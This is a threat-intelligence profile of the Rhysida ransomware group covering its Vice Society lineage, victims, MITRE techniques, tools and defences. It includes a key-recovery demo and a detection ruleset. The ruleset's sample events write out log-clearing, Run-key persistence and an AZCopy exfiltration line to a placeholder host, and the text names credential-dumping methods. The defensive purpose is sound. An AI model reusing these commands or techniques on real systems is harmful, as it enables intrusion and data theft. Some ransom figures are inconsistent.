Rhysida
Rhysida is a Ransomware-as-a-Service operation active since May 2023, assessed by Sophos, Check Point, and Microsoft to represent the operational successor to the Vice Society ransomware group. Rhysida is named after a genus of centipedes and targets organizations it describes as "targets of opportunity" across healthcare, education, government, and manufacturing — deploying double extortion and a distinctive dark web auction model for stolen data rather than a fixed ransom demand. The April 2025 CISA advisory update confirmed the group is still evolving its techniques as of December 2024.
Overview
Rhysida first appeared in May 2023, though samples analyzed later place its earliest activity in January 2023. Within months of public emergence the group went from what researchers initially described as "novice malware" to a sophisticated double-extortion operation targeting critical infrastructure — a trajectory that, combined with significant TTP overlap with Vice Society, led Sophos, Check Point, and Microsoft to conclude that Rhysida represents Vice Society operators adopting a new platform rather than an entirely new criminal organization.
The Vice Society connection is well-evidenced. Sophos tracks the activity cluster as TAC5279, which it first observed using Vice Society ransomware in November 2022. The same cluster switched to deploying Rhysida in June 2023 — precisely when Vice Society's leak site went quiet after posting victims consistently since 2021. The timing of Vice Society's last victim post and Rhysida's first victim post in mid-2023 forms a near-seamless handoff. Shared tooling — particularly the use of SystemBC for C2, consistent PowerShell scripting patterns, and AnyDesk as the preferred RMM tool — reinforces that these are the same operators with a new payload. CISA's advisory explicitly notes the similarity and cross-references the Vice Society advisory.
Rhysida takes its name from the Rhysida genus of centipedes — an apparent reference to stealth and operating in shadows. The group brands itself as a "cybersecurity team" in ransom communications, framing attacks as penetration tests and advising victims to "reach out as soon as possible to stop the leakage of your confidential information to the public." This theatrical framing is consistent with Vice Society's prior communications style.
One technically significant event in Rhysida's history is the February 2024 publication of a decryptor tool by South Korean researchers from Kookmin University and KISA. They discovered a vulnerability in Rhysida's ChaCha20-based CSPRNG implementation — the encryption key seed was derived from system time using the C standard library's rand() function, making keys predictable and recoverable. Avast had independently discovered the flaw in August 2023 and privately provided decryption to victims for months. KISA released the tool publicly in February 2024, likely prompting Rhysida to patch the cryptographic vulnerability in subsequent builds. The group's continued activity after the decryptor's publication confirms an updated payload was deployed.
The April 30, 2025 CISA advisory update added new IOCs from investigations as recently as December 2024 and introduced documentation of new initial access vectors including Gootloader delivery and AZCopy/StorageExplorer for cloud data exfiltration — confirming ongoing operational evolution. The update also flagged similarities between Rhysida and the emerging Interlock ransomware variant. Notably, CISA's own joint advisory on Interlock ransomware (AA25-203A, July 2025) explicitly cross-references the Rhysida advisory and states that authoring agencies are aware of open-source reporting detailing code and technique similarities between the two variants — placing the Rhysida/Interlock relationship on official record rather than as researcher speculation alone.
Target Profile
CISA describes Rhysida as targeting "victims of opportunity" — organizations that present accessible attack surfaces rather than targets chosen by sector. That said, the victim portfolio shows a consistent preference for sectors with high-value sensitive data and regulatory pressure to restore operations quickly.
- Healthcare: A primary growth sector for Rhysida, inherited from Vice Society's playbook. Prospect Medical Holdings — a California-based conglomerate operating 17 hospitals and 166 clinics across multiple states — was hit in 2023, with 1.3 TB of SQL databases and 1 TB of documents exfiltrated. In 2024, at least 68 healthcare organizations were targeted using Cobalt Strike in the attack chain. Healthcare victims face life-safety pressure to restore systems quickly, regulatory exposure under HIPAA, and hold high-value patient data — all factors that maximize payment pressure.
- Education: A Vice Society specialty inherited by Rhysida. Universities, school districts, and K-12 systems are consistently targeted. These organizations hold sensitive student and staff data, often run complex distributed networks with limited security budgets, and face significant public accountability pressure. The Vice Society playbook of targeting education — which accounted for 38.4% of Vice Society's attacks — is reflected in Rhysida's continued focus on the sector.
- Government and Public Sector: Municipal governments, transportation agencies, and public institutions appear regularly on Rhysida's leak site. The City of Columbus (Ohio), Maryland Transit Administration, Port of Seattle / Seattle-Tacoma International Airport, Oregon Department of Environmental Quality, and the Chilean Army are among confirmed government victims. The Port of Seattle attack generated Rhysida's largest ever ransom demand of $5.8 million; Rhysida's average demand across confirmed incidents is approximately $1.1 million. Public sector organizations face reputational pressure that heightens ransom leverage, and their data — including law enforcement records and emergency services access — commands high dark web auction values.
- Manufacturing and IT: Consistent with CISA's advisory targeting profile. Supply chain-adjacent organizations and managed service providers are targeted both for direct extortion and for the downstream access their compromise can enable.
- Cultural and Media institutions: The British Library and Insomniac Games attacks demonstrated Rhysida's willingness to target high-profile cultural and entertainment institutions. The reputational damage of a major cultural institution losing a decade of digital infrastructure — and a major game studio having unreleased Marvel IP dumped publicly — generates media coverage that amplifies the group's notoriety and future leverage.
Tactics, Techniques & Procedures
TTPs sourced from CISA advisory AA23-319A (updated April 30, 2025), Sophos incident response analysis (TAC5279 cluster), and field reporting. Rhysida operates as both a closed operation and a RaaS model with affiliates; individual affiliate TTPs vary but the core toolchain and extortion model are consistent.
| MITRE ID | Technique | Description |
|---|---|---|
| T1133 | External Remote Services | VPN access is the primary initial access vector. Rhysida actors leverage internet-facing VPN services — both via phishing-harvested credentials and by exploiting known CVEs (notably ZeroLogon CVE-2020-1472 against domain controllers). The British Library attack was initiated via a VPN vulnerability that allowed bypassing the perimeter firewall. |
| T1566 | Phishing | Phishing emails used for both initial access and Cobalt Strike payload delivery. In 2025, Gootloader — delivered via SEO poisoning (malicious websites ranking for software download searches) — was added as an initial access vector, providing trojanized software installers that deploy backdoor access. |
| T1059.001 | PowerShell | Extensive PowerShell use for discovery, credential harvesting support, defense evasion, and payload staging. Documented PowerShell scripts systematically disable and stop security-related services including SQL, Oracle, Exchange, Veeam backup, Hyper-V, Malwarebytes, and antivirus processes before encryption. |
| T1105 | Ingress Tool Transfer | Malicious executables staged in created folders C:\in and C:\out on compromised systems — a documented Rhysida actor staging pattern. Tools transferred to compromised hosts include Cobalt Strike beacons, credential harvesting utilities, and the Rhysida encryptor binary. |
| T1003.001 | OS Credential Dumping: LSASS Memory | Secretsdump used for credential harvesting. Combined with ntdsutil for NTDS.dit extraction and PowerShell-based enumeration tools. Credentials from domain controllers enable rapid lateral movement across the environment using legitimate administrator accounts. |
| T1021.001 | Remote Services: RDP | RDP used throughout the lateral movement phase alongside AnyDesk and PuTTY for interactive access. SystemBC — the C2 tool carried over from Vice Society operations — provides persistent encrypted communication channels. Rhysida uses RDP to blend with legitimate admin activity during extended dwell periods averaging approximately 30 days before encryption. |
| T1070.001 | Indicator Removal: Clear Windows Event Logs | wevtutil.exe used to clear System, Application, and Security event log categories post-access. Combined with Windows Defender exclusion additions for executable files and registry modifications — a documented evasion script pattern used by Rhysida affiliates to suppress security telemetry before and during encryption. |
| T1530 | Data from Cloud Storage | A 2025 evolution documented in the updated CISA advisory: AZCopy (Microsoft's command-line utility for Azure storage transfers) and StorageExplorer-windows-x64.exe used to exfiltrate data to and from Azure storage accounts. This represents a shift toward cloud-native exfiltration channels that blend with legitimate enterprise cloud operations. |
| T1486 | Data Encrypted for Impact | 4096-bit RSA key pair generation per victim; ChaCha20 stream cipher for file encryption (via LibTomCrypt). Files appended with .rhysida extension. A cryptographic implementation vulnerability in early versions (ChaCha20-based CSPRNG seeded with system time via C rand()) enabled decryption without the key — discovered by multiple independent parties and publicly released as a free decryption tool by KISA in February 2024. Updated builds address this flaw. |
| T1657 | Financial Theft — Extortion | Ransom note "CriticalBreachDetected.pdf" dropped as PDF in encrypted directories — PDF format noted by CISA as suggesting Rhysida targets systems compatible with PDF rendering. Victims provided a unique code and Tor .onion portal URL. Demands made in Bitcoin. Unique extortion model: stolen data listed on the Rhysida dark web site as an exclusive auction — "We sell only to one hand, no reselling" — with a deadline before public release if no buyer is found. |
KISA published a free decryptor for Rhysida in February 2024. It exploits a vulnerability in the CSPRNG implementation of early Rhysida builds — encryption keys were derived from system time using C's rand() function, making them predictable. Avast had independently discovered the flaw in August 2023 and privately assisted victims. The decryptor applies only to earlier builds; Rhysida updated its cryptographic implementation following public disclosure. If your organization was compromised before mid-2024 and has not yet recovered encrypted files, consulting the KISA decryption tool is worth evaluating before paying. Post-mid-2024 builds are not known to be decryptable without the key.
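As an added illustration of the flaw described above (this is not Rhysida's, Avast's or KISA's code): a time-seeded key generator beside the correct CSPRNG source, with the seed search a decryptor for such builds relies on. Python's random module stands in for C rand(), and the timestamp and search window are assumed values.

```python
"""Why seeding key generation from the clock fails (added example, not Rhysida's,
Avast's or KISA's code). Python's random.Random stands in for the C rand() the
page describes; the weakness shown is the seed space, not the PRNG algorithm."""
import math
import random
import secrets


def weak_key(seed_time: int, nbytes: int = 32) -> bytes:
    """Key derivation as the page describes the early builds: seed a
    non-cryptographic PRNG with wall-clock seconds, then draw key bytes.
    Same second in, same key out."""
    prng = random.Random(seed_time)
    return bytes(prng.getrandbits(8) for _ in range(nbytes))


def strong_key(nbytes: int = 32) -> bytes:
    """The correct source: the OS CSPRNG, which has no guessable seed."""
    return secrets.token_bytes(nbytes)


def effective_key_bits(window_seconds: int) -> float:
    """A 256-bit key from weak_key() has only log2(window) bits of security,
    because a decryptor (or anyone else) need only search the plausible seeds."""
    return math.log2(window_seconds)


def recover_weak_key(key_check: bytes, approx_time: int, window: int):
    """What a decryptor for the flawed builds does: regenerate the key for
    every seed within +/- window seconds of the estimated encryption time
    (file mtime, event timestamp) and test it. key_check stands in for a
    real test such as decrypting a known-plaintext file with the candidate.
    Returns (seed, key) or None."""
    for delta in range(-window, window + 1):
        candidate = approx_time + delta
        key = weak_key(candidate)
        if key.startswith(key_check):
            return candidate, key
    return None


if __name__ == "__main__":
    # Constructed scenario: encryption at assumed epoch 1700000000, and the
    # responder knows the time to within five minutes.
    true_time = 1700000000
    key = weak_key(true_time)
    found = recover_weak_key(key[:8], true_time + 97, window=300)
    print("recovered:", found is not None and found[1] == key)
    # A 30-day window is ~2.6 million seeds, i.e. about 21 bits, not 256.
    print("effective bits, 30-day window:", round(effective_key_bits(30 * 86400), 1))
    print("two strong keys differ:", strong_key() != strong_key())
```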
Known Campaigns
Selected confirmed and high-profile attributed incidents. Rhysida typically operates with extended dwell periods — averaging approximately 30 days between initial access and encryption — giving well-monitored environments a detection window before the final payload stage.
Rhysida attacked the British Library — one of the world's largest and most prestigious research libraries, holding over 170 million items — in late October 2023. Initial access was gained via a VPN vulnerability allowing perimeter bypass. The attack encrypted files and exfiltrated approximately 600 GB of sensitive data including personal details of library staff and users. Rhysida demanded 20 Bitcoin (approximately $590,000 at the time). The Library refused to pay. In late November, Rhysida published 490,191 files totaling 573 GB on its dark web site. Recovery cost the library an estimated $7.5–$8.7 million USD and disrupted services for more than a year — the Library's core software systems could not be restored in their pre-attack form because the underlying platforms were no longer vendor-supported. This attack is documented as a case study in why legacy infrastructure creates compounding ransomware recovery risk.
Rhysida compromised Insomniac Games — a Sony-owned video game studio — and exfiltrated 1.67 terabytes of data. When no buyer was found at auction, Rhysida published the full dataset publicly. The leak included employee passport scans, HR documents, screenshots of internal Slack conversations, non-disclosure agreements, contract details, and complete development materials for the unreleased Marvel's Wolverine game — including build details, character designs, and storyline content. The impact extended well beyond the studio: employees faced identity theft risk from exposed personal documents, and Sony's anticipated game release timeline was disrupted. The leak remains actively shared across gaming communities.
Rhysida attacked Prospect Medical Holdings, a California-based healthcare conglomerate operating 17 hospitals and 166 clinics across the United States, on approximately August 3, 2023. Employees discovered ransom notes on their screens stating the network had been hacked and devices encrypted. Rhysida exfiltrated 1.3 TB of SQL databases and 1 TB of documents — including corporate records, patient data, and Social Security Numbers for approximately 500,000 individuals. The group listed the data for sale at 50 Bitcoin (approximately $1.5 million). The attack disrupted operations across multiple states, forcing hospitals to divert ambulances and revert to paper systems, directly impacting patient care.
Rhysida attacked the City of Columbus on July 18, 2024, exfiltrating 6.5 TB of data from city servers. The city's IT team successfully stopped Rhysida from completing encryption of city data — but the exfiltrated data was already gone. Rhysida listed the data for 30 Bitcoin (approximately $1.9 million), including databases, employee credentials, emergency services application data, city camera access, payroll information, and personal messages. After the auction deadline passed without a buyer, Rhysida released the data publicly. At least 12 Columbus police officers had bank accounts compromised in the aftermath. The incident affected over 500,000 individuals and generated an unusual public dispute: Columbus initially claimed the leaked data was "corrupted or incomplete," a position challenged by security researchers who accessed and verified the leak contents, leading to legal proceedings over the researchers' right to publicly discuss the breach.
Rhysida hit Holding Slovenske Elektrarne (HSE), Slovenia's largest power generation company, on November 22, 2023. The attack targeted one of the European Union's critical energy infrastructure operators, claiming 1 TB of documents and 1.3 TB of databases. The attack demonstrated Rhysida's willingness to target energy sector critical infrastructure — not merely data-rich organizations — raising the potential for operational disruption beyond financial extortion.
Rhysida attacked Lurie Children's Hospital on January 31, 2024, forcing the hospital to take its phone, email, Epic EHR, and MyChart patient portal systems offline. Staff reverted to manual paper-based procedures for patient records. It took until May 20, 2024 — nearly four months — to restore access to the EHR. The forensic investigation confirmed unauthorized access from January 26 to 31, 2024. Rhysida demanded 60 Bitcoin (approximately $3.4 million), threatening to sell the exfiltrated data — which they subsequently claimed to have done when payment was not made. The breach ultimately affected 791,784 individuals, including patients and staff, with exposed data including names, addresses, Social Security numbers, medical records, health insurance details, and clinical information. Rhysida's $3.4 million demand matched its Maryland MTA demand and was its second-largest known ransom at that time, surpassed only by the Port of Seattle attack.
Rhysida attacked the Port of Seattle on August 24, 2024 — the US government agency managing Seattle-Tacoma International Airport and Seattle's seaport and maritime operations. The attack took down baggage handling, check-in, reserved parking, and online systems for several weeks. The Port confirmed it was Rhysida ransomware and stated it had refused to pay the ransom. 90,000 individuals' records were ultimately breached. Rhysida's ransom demand of $5.8 million (equivalent) is the group's largest ever recorded demand. When the Port declined to pay, Rhysida published the exfiltrated data on its dark web leak site. The attack demonstrates Rhysida's capability and willingness to target US federal and port authority critical infrastructure — not only healthcare and education — and to sustain extended operational disruption at a major international airport.
Rhysida claimed responsibility for a cyberattack on the Maryland Transit Administration (MTA), part of the Maryland Department of Transportation. The breach exposed sensitive personal data — names, Social Security numbers, driver's licenses, and passports — of MTA personnel and contractors. Rhysida demanded 30 Bitcoin (approximately $3.4 million) to stop the stolen information from being released publicly. The attack was one of a series of 2025 incidents that confirmed Rhysida's continued activity against government transportation infrastructure.
Tools & Malware
- Rhysida ransomware encryptor: 64-bit PE Windows application compiled with MINGW/GCC. Uses a 4096-bit RSA key pair generated per victim for key encapsulation; ChaCha20 stream cipher (via LibTomCrypt) for file encryption. Appends .rhysida extension to encrypted files. Drops "CriticalBreachDetected.pdf" ransom note in PDF format. Self-deletes after encryption to hinder forensic analysis. Compatible with pre-Windows 10 versions, expanding the potential victim base. Early builds contained a CSPRNG vulnerability enabling decryption without the key (patched following public disclosure in February 2024). Notably, early Rhysida samples — flagged by the HHS HC3 sector alert in August 2023 — lacked commodity ransomware features including VSS shadow copy deletion, multiple persistence mechanisms, and process termination unhooking. This absence of VSS deletion in early versions creates a potential recovery path for organizations compromised before the payload matured. Whether later builds added VSS deletion is not consistently confirmed across sources — forensic review is recommended before assuming VSS copies are unavailable.
- SystemBC: Proxy/C2 tool carried over from Vice Society operations. Used for persistent encrypted C2 communication. Sophos documents SystemBC PowerShell scripts named svchost.ps1 establishing persistence via HKCU run keys — the same pattern observed in TAC5279's Vice Society-era operations, providing direct attribution evidence.
- Cobalt Strike: Industry-standard penetration testing framework used post-access for C2, lateral movement staging, and payload delivery. Used alongside SystemBC in documented Rhysida campaigns.
- CleanUpLoader: Custom loader used in some Rhysida campaigns for payload delivery and post-exploitation staging.
- Gootloader (2025 addition): Malware-as-a-service delivery framework distributed through SEO poisoning — malicious websites ranking for software download search terms delivering trojanized installers. Added to Rhysida's initial access toolkit as documented in the April 2025 CISA advisory update.
- AZCopy / StorageExplorer (2025): Microsoft Azure command-line and GUI tools abused for cloud-native data exfiltration to attacker-controlled Azure storage accounts. Documented in the April 2025 CISA advisory update as new exfiltration methods observed in Rhysida operations through December 2024.
- AnyDesk / PuTTY / RDP: Legitimate remote access tools used for persistent access, lateral movement, and interactive operator presence throughout dwell periods. Inherited from Vice Society operational tradecraft.
- Secretsdump / ntdsutil: Credential harvesting tools for LSASS memory dumping and NTDS.dit extraction from domain controllers, providing domain-wide credential access to enable unrestricted lateral movement.
- wevtutil.exe: Native Windows event log management utility used to clear System, Application, and Security event logs post-access, removing forensic evidence of the intrusion before encryption begins.
Indicators of Compromise
IOCs sourced from CISA advisory AA23-319A (updated April 30, 2025). The updated advisory includes current email accounts, URLs, file paths, and network indicators from FBI investigations through December 2024; the original November 2023 IOCs were partially removed in the April 2025 update because they were assessed as outdated. Use only the current version of AA23-319A available at cisa.gov: Tables 4–6 (email, URL, and file path IOCs) and Table 9 onward (MITRE ATT&CK mappings) contain the most current operational indicators.
Mitigation & Defense
Rhysida's primary initial access paths are VPN credential compromise and phishing. The 30-day average dwell period before encryption creates a genuine detection window for organizations with active monitoring — unlike faster-moving operators who encrypt within hours of access.
- Enforce MFA on all VPN access: VPN credential exploitation — either via phishing-harvested credentials or CVE exploitation — is Rhysida's primary initial access vector. Phishing-resistant MFA (FIDO2/passkeys) on all VPN portals closes this path. TOTP-based MFA provides partial protection but remains vulnerable to real-time phishing. Any VPN portal without MFA in Rhysida's target sectors should be treated as an active risk requiring immediate remediation.
- Deploy SEO poisoning awareness and software download controls: The 2025 addition of Gootloader to Rhysida's access toolkit means employees searching for legitimate software downloads may receive trojanized installers from malicious sites ranking in search results. Enforce approved software distribution through IT-managed channels and blocklist direct .exe downloads from unrecognized domains. User awareness training should include explicit coverage of software download risk.
- Monitor for staging directory creation: Rhysida actors consistently create C:\in and C:\out directories on compromised systems for tool staging. Alert on the creation of these specific directories on any domain-joined system outside of approved change management. Broader alerts on new directory creation at the C:\ root level from non-administrative processes catch this class of behavior.
- Hunt for SystemBC and svchost.ps1: The SystemBC PowerShell persistence script named svchost.ps1 establishing a HKCU run key is a documented TAC5279 tradecraft signature carried over from Vice Society. SIEM rules hunting for PowerShell scripts named svchost.ps1 in user context — or any new HKCU run key entry — can identify Rhysida presence during the dwell period, before encryption is triggered.
- Alert on wevtutil event log clearing: wevtutil.exe invocations clearing System, Application, or Security logs are a documented Rhysida pre-encryption behavior. These should trigger immediate tier-1 escalation regardless of the security context. Legitimate administrative use of wevtutil for log clearing outside approved maintenance windows is rare.
- Monitor AZCopy and StorageExplorer executions: The 2025 CISA advisory documents Rhysida's use of AZCopy and StorageExplorer for cloud-native exfiltration. Alert on execution of these tools on systems where they are not part of approved cloud management workflows, particularly when combined with large outbound network transfers to Azure blob storage endpoints.
- Patch ZeroLogon and VPN appliance CVEs: CVE-2020-1472 (ZeroLogon) is a documented Rhysida initial access vector. Any domain controller still vulnerable to ZeroLogon represents a critical unmitigated risk. VPN appliance CVEs should be patched on a sub-72-hour timeline for critical vulnerabilities given their consistent use as ransomware entry points across Rhysida and peer groups.
- Use the 30-day dwell window: Unlike groups that encrypt within hours of access, Rhysida's documented average dwell period of approximately 30 days between initial access and encryption provides a genuine detection opportunity. Organizations with 24/7 EDR monitoring and behavioral alerting — particularly for credential harvesting, lateral movement via RDP, and event log clearing — have a realistic chance of detecting and evicting Rhysida before the encryption phase begins. This window does not exist for faster-moving operators; it is a Rhysida-specific defensive advantage worth explicitly incorporating into incident response planning.
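The staging-directory, svchost.ps1 run-key, wevtutil and AZCopy/StorageExplorer items above as detection logic, run over constructed Sysmon-style events (an added example, not CISA's or Sophos's code). It assumes Sysmon field names (EventID 1 process create, 11 file create, 13 registry value set) and an assumed allowlist APPROVED_CLOUD_HOSTS; all hosts, users and paths are made up.

```python
# Added example (not CISA's or Sophos's code): Sysmon-style fields, constructed events.
from dataclasses import dataclass
from typing import Callable, Dict, List

Event = Dict[str, object]
APPROVED_CLOUD_HOSTS = {"cloudmgmt01"}  # assumed: hosts where AZCopy use is sanctioned
LOGS_OF_INTEREST = {"system", "application", "security"}
RUN_KEY = "\\software\\microsoft\\windows\\currentversion\\run\\"

def _s(ev: Event, key: str) -> str:
    """Field as a lowercase string; a missing field reads as empty."""
    return str(ev.get(key, "")).lower()

def _image_name(ev: Event) -> str:
    return _s(ev, "Image").rsplit("\\", 1)[-1]

def is_log_clear(ev: Event) -> bool:
    """T1070.001: wevtutil cl / clear-log against System, Application or Security."""
    tokens = set(_s(ev, "CommandLine").split())
    return (ev.get("EventID") == 1 and _image_name(ev) == "wevtutil.exe"
            and bool(tokens & {"cl", "clear-log"}) and bool(tokens & LOGS_OF_INTEREST))

def is_staging_write(ev: Event) -> bool:
    """T1105: Sysmon 11 logs file creation, not mkdir, so any file written under
    C:\\in or C:\\out is the practical proxy for the staging directories."""
    return ev.get("EventID") == 11 and _s(ev, "TargetFilename").startswith(("c:\\in\\", "c:\\out\\"))

def is_svchost_ps1_runkey(ev: Event) -> bool:
    """T1059.001: HKCU (shown as HKU\\<SID>) Run value launching svchost.ps1."""
    return (ev.get("EventID") == 13 and RUN_KEY in _s(ev, "TargetObject")
            and "svchost.ps1" in _s(ev, "Details"))

def is_cloud_copy_tool(ev: Event) -> bool:
    """T1530: AZCopy / Storage Explorer started on a host not approved for it."""
    return (ev.get("EventID") == 1
            and _image_name(ev) in {"azcopy.exe", "storageexplorer-windows-x64.exe"}
            and _s(ev, "Computer") not in APPROVED_CLOUD_HOSTS)

@dataclass(frozen=True)
class Rule:
    name: str
    severity: str
    technique: str
    match: Callable[[Event], bool]

RULES = [
    Rule("wevtutil cleared a core event log", "high", "T1070.001", is_log_clear),
    Rule("file staged under C:\\in or C:\\out", "medium", "T1105", is_staging_write),
    Rule("HKCU Run value points at svchost.ps1", "high", "T1059.001", is_svchost_ps1_runkey),
    Rule("AZCopy/StorageExplorer on unapproved host", "medium", "T1530", is_cloud_copy_tool),
]

def evaluate(events: List[Event]) -> List[Dict[str, object]]:
    """One alert per (event, matching rule), in event order."""
    return [{"event_index": i, "rule": r.name, "severity": r.severity,
             "technique": r.technique, "host": ev.get("Computer"), "user": ev.get("User")}
            for i, ev in enumerate(events) for r in RULES if r.match(ev)]

PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS: List[Event] = [  # constructed telemetry; hosts, users and paths are made up
    {"EventID": 1, "Computer": "fs01", "User": r"CORP\svc-backup",
     "Image": r"C:\Windows\System32\wevtutil.exe", "CommandLine": "wevtutil.exe cl Security"},
    {"EventID": 11, "Computer": "fs01", "User": r"CORP\svc-backup", "Image": PS,
     "TargetFilename": r"C:\in\stage.exe"},
    {"EventID": 13, "Computer": "ws042", "User": r"CORP\j.doe", "Image": PS,
     "TargetObject": r"HKU\S-1-5-21-111-222-333-1001\Software\Microsoft\Windows\CurrentVersion\Run\svchost",
     "Details": r"powershell.exe -w hidden -f C:\Users\j.doe\AppData\Roaming\svchost.ps1"},
    {"EventID": 1, "Computer": "fs01", "User": r"CORP\svc-backup", "Image": r"C:\Tools\azcopy.exe",
     "CommandLine": r"azcopy.exe copy D:\share\finance https://PLACEHOLDER.blob.core.windows.net/c --recursive"},
    {"EventID": 1, "Computer": "cloudmgmt01", "User": r"CORP\cloudadmin",  # sanctioned host: no alert
     "Image": r"C:\Program Files\azcopy\azcopy.exe", "CommandLine": "azcopy.exe jobs list"},
    {"EventID": 1, "Computer": "ws042", "User": r"CORP\j.doe",  # log query, not a clear: no alert
     "Image": r"C:\Windows\System32\wevtutil.exe", "CommandLine": "wevtutil.exe qe Application /c:5"},
]

if __name__ == "__main__":
    for alert in evaluate(SAMPLE_EVENTS):
        print(alert)
```

Tuning the thresholds is the real work: the staging and cloud-tool rules are medium severity because both have benign look-alikes, whereas a Run value pointing at svchost.ps1 or a wevtutil clear of the Security log has none worth suppressing.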
Sources & Further Reading
- CISA / FBI / HHS / MS-ISAC — #StopRansomware: Interlock Ransomware, Advisory AA25-203A (July 2025) — explicitly cross-references Rhysida code and technique similarities
- Ransom-DB — Rhysida Ransomware Group Profile: 2026 Analysis (January 2026)
- Industrial Cyber — Rhysida Claims Maryland Transit Administration Breach (September 2025) — includes demand history and Comparitech data
- CISA / FBI / MS-ISAC — #StopRansomware: Rhysida Ransomware, Advisory AA23-319A (November 2023; updated April 30, 2025)
- Sophos X-Ops — Same Threats, Different Ransomware: Vice Society and Rhysida TAC5279 Cluster Analysis (November 2023)
- SC World — Rhysida Ransomware Decryptor Publicly Released (February 2024)
- Barracuda Networks — Rhysida Ransomware: The Creepy Crawling Criminal Hiding in the Dark (May 2024)
- Huntress Threat Library — Rhysida Threat Actor Profile (2025)
- eSentire — Rhysida Ransomware Group Targets Hospitals, Power Plants, and Schools (2024)
- HIPAA Journal — Rhysida Healthcare Sector Coverage (ongoing)
- HHS HC3 — Rhysida Ransomware Sector Alert (2023)